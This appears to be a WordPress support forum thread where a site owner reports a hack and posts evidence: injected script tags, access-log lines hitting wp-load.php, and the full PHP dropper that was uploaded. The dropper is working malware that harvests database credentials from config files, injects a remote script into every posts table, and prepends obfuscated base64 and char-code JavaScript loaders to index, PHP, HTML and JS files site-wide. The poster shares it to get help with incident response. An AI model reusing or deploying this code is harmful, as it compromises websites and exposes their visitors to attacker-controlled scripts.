5.4.2 Attacked
-
We have the latest version of WordPress, and our site was attacked with injections in both code (WP and all plugins) and database.
The code that was injected was:
Database:
<script src=\'https://js.xxxxxxxxxx.ga/stat.js?n=ns1\' type=\'text/javascript\'></script>
PHP Files:
<script src='https://js.xxxxxxxx.ga/stat.js?n=ns1' type='text/javascript'></script>
Our server logs showed the wp-load.php was attacked:
54.206.73.91 - - [31/Jul/2020:13:46:06 +1200] "POST /wp-load.php?pubkey=xxxxxxxxxxxx&bvTime=1596159965&bvVersion=0.1&bvMethod=activateinfo&sha1=true&sig=xxxxxxxxx HTTP/1.1" 200 1340 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 54.206.73.91 - - [31/Jul/2020:13:46:09 +1200] "POST /wp-load.php?pubkey=xxxxxxx&bvTime=1596159968&bvVersion=0.1&bvMethod=updt&sha1=true&sig=xxxxxx HTTP/1.1" 200 714 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 54.206.73.91 - - [31/Jul/2020:13:46:11 +1200] "POST /wp-load.php?pubkey=xxxxxx&bvTime=1596159970&bvVersion=0.1&bvMethod=getoption&sha1=true&sig=xxxxx HTTP/1.1" 200 741 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 54.206.73.91 - - [31/Jul/2020:13:46:15 +1200] "POST /wp-load.php?pubkey=xxxxx&bvTime=1596159974&bvVersion=0.1&bvMethod=gtwp&sha1=true&sig=xxxxx HTTP/1.1" 200 1335 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 54.206.73.91 - - [31/Jul/2020:13:46:22 +1200] "POST /wp-load.php?pubkey=xxxxx&bvTime=1596159981&bvVersion=0.1&bvMethod=gtsym&sha1=true&sig=xxxxx HTTP/1.1" 200 830 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 54.206.73.91 - - [31/Jul/2020:13:46:25 +1200] "POST /wp-load.php?pubkey=xxxxx&bvTime=1596159984&bvVersion=0.1&bvMethod=gtusrs&sha1=true&sig=xxxxx HTTP/1.1" 200 1988 "https://wordpress-site.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" [redundant lines redacted]
it uploaded a document that was executed at the site root:
<?php error_reporting(E_ALL); ini_set('display_errors',1); @search_file_index($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","index."); function get_var_reg($pat,$text) { if ($c = preg_match_all ("/".$pat."/is", $text, $matches)) { return $matches[1][0]; } return ""; } function search_file_ms($dir,$file_to_search){ $search_array = array(); $files = scandir($dir); if($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { @search_file_ms( $dir,$file_to_search); return; } if($dir == $_SERVER['DOCUMENT_ROOT']."/") { @search_file_ms( $dir,$file_to_search); return; } } foreach($files as $key => $value){ $path = realpath($dir.DIRECTORY_SEPARATOR.$value); if(!is_dir($path)) { if (strpos($value,$file_to_search) !== false) { show_sitenames($path); } } else if($value != "." && $value != "..") { @search_file_ms($path, $file_to_search); } } } function show_sitenames($file){ $content = @file_get_contents($file); if(strpos($content, "DB_NAME") !== false) { $db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content); $host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content); $user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content); $pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content); // Create connection $conn = new mysqli($host, $user, $pass); // Check connection if ($conn->connect_error) { } else { $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE <code>TABLE_NAME</code> LIKE '%post%'"; $result = $conn->query($q); if ($result->num_rows > 0) { while($row = $result->fetch_assoc()) { $q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." LIMIT 1 "; $result2 = $conn->query($q2); if ($result2->num_rows > 0) { while($row2 = $result2->fetch_assoc()) { $val = $row2['post_content']; if(strpos($val, "developerstatss") === false){ if(strpos($val, "developerstatss") === false){ $q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://js.developerstatss.ga/stat.js?n=ns1' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%developerstatss%'"; $conn->query($q3); echo "sql:" . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]; } else { } } } } else { } } } else { } $conn->close(); } } } function search_file($dir,$file_to_search){ $files = @scandir($dir); if($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { @search_file( $dir,$file_to_search); return; } if($dir == $_SERVER['DOCUMENT_ROOT']."/") { @search_file( $dir,$file_to_search); return; } } foreach($files as $key => $value){ $path = realpath($dir.DIRECTORY_SEPARATOR.$value); if(!is_dir($path)) { if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) { make_it($path); } }else if($value != "." && $value != "..") { search_file($path, $file_to_search); } } } function search_file_index($dir,$file_to_search){ $files = @scandir($dir); if($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { @search_file_index( $dir,"index."); return; } if($dir == $_SERVER['DOCUMENT_ROOT']."/") { @search_file_index( $dir,"index."); return; } } foreach($files as $key => $value){ $path = realpath($dir.DIRECTORY_SEPARATOR.$value); if(!is_dir($path)) { if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) { make_it_index($path); } }else if($value != "." && $value != "..") { search_file_index($path, $file_to_search); } } } function search_file_js($dir,$file_to_search){ $files = @scandir($dir); if($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { @search_file_js( $dir,".js"); return; } if($dir == $_SERVER['DOCUMENT_ROOT']."/") { @search_file_js( $dir,".js"); return; } } foreach($files as $key => $value){ $path = realpath($dir.DIRECTORY_SEPARATOR.$value); if(!is_dir($path)) { if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) { make_it_js($path); } }else if($value != "." && $value != "..") { search_file_js($path, $file_to_search); } } } function make_it_js($f){ $g = file_get_contents($f); if (strpos($g, '104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116,46') !== false) { } else { $l2 = base64_decode("RWxlbWVudC5wcm90b3R5cGUuYXBwZW5kQWZ0ZXIgPSBmdW5jdGlvbihlbGVtZW50KSB7ZWxlbWVudC5wYXJlbnROb2RlLmluc2VydEJlZm9yZSh0aGlzLCBlbGVtZW50Lm5leHRTaWJsaW5nKTt9LCBmYWxzZTsoZnVuY3Rpb24oKSB7IHZhciBlbGVtID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudChTdHJpbmcuZnJvbUNoYXJDb2RlKDExNSw5OSwxMTQsMTA1LDExMiwxMTYpKTsgZWxlbS50eXBlID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTYsMTAxLDEyMCwxMTYsNDcsMTA2LDk3LDExOCw5NywxMTUsOTksMTE0LDEwNSwxMTIsMTE2KTsgZWxlbS5zcmMgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEwNCwxMTYsMTE2LDExMiwxMTUsNTgsNDcsNDcsMTA2LDExNSw0NiwxMDAsMTAxLDExOCwxMDEsMTA4LDExMSwxMTIsMTAxLDExNCwxMTUsMTE2LDk3LDExNiwxMTUsMTE1LDQ2LDEwMyw5Nyw0NywxMTUsMTE2LDk3LDExNiw0NiwxMDYsMTE1LDYzLDExMCw2MSwxMTAsMTEwLDUxKTtlbGVtLmFwcGVuZEFmdGVyKGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKFN0cmluZy5mcm9tQ2hhckNvZGUoMTE1LDk5LDExNCwxMDUsMTEyLDExNikpWzBdKTtlbGVtLmFwcGVuZEFmdGVyKGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LDEwMSw5NywxMDApKVswXSk7ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoU3RyaW5nLmZyb21DaGFyQ29kZSgxMDQsMTAxLDk3LDEwMCkpWzBdLmFwcGVuZENoaWxkKGVsZW0pO30pKCk7"); $g = file_get_contents($f); $g = $l2.$g; @system('chmod 777 '.$f); @file_put_contents($f,$g); echo "js:".$f."\r\n"; } } function make_it_index($f){ if (strpos($g, '104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116') !== false || strpos($g, 'developerstatss.ga') !== false) { } else { $l2 = "<script type='text/javascript' src='https://js.developerstatss.ga/stat.js?n=nb5'></script>"; $g = file_get_contents($f); $g = $l2.$g; @system('chmod 777 '.$f); @file_put_contents($f,$g); echo "in:".$f."\r\n"; } } function make_it($f){ $g = file_get_contents($f); if (strpos($g, '104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116,46,106,115,63,118,61,49') !== false) { } else { $l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116,46,106,115,63,110,61,50);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>"; if (strpos($g, '<head>') !== false) { $b = str_replace("<head>","<head>".$l2,$g); @system('chmod 777 '.$f); @file_put_contents($f,$b); echo "hh:".$f."\r\n"; } if (strpos($g, '</head>') !== false) { $b = str_replace("</head>",$l2."</head>",$g); @system('chmod 777 '.$f); @file_put_contents($f,$b); echo "hh:".$f."\r\n"; } } }
Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
- The topic ‘5.4.2 Attacked’ is closed to new replies.